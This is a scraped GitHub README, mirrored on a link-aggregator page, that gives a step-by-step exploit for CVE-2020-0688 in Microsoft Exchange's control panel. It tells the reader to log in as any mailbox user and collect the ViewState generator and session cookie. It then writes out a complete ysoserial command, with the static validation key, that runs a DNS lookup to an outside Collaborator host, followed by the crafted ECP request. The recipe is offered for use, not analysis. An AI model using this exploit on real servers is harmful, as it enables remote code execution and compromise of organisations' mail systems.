21

GitHub - random-robbie/cve-2020-0688: cve-2020-0688

 4 years ago
source link: https://github.com/random-robbie/cve-2020-0688
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

README.md

cve-2020-0688

cve-2020-0688

Login with a user with an email address privliage is nothing to worry about.

Grab - __VIEWSTATEGENERATOR from page source Grab - the value of ASP.NET_SessionId cookie for viewstateuserkey value

Download YSO Here

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

GET TO:

https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

The Exploit.py is untested and need a demo system to fire up and play with.


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK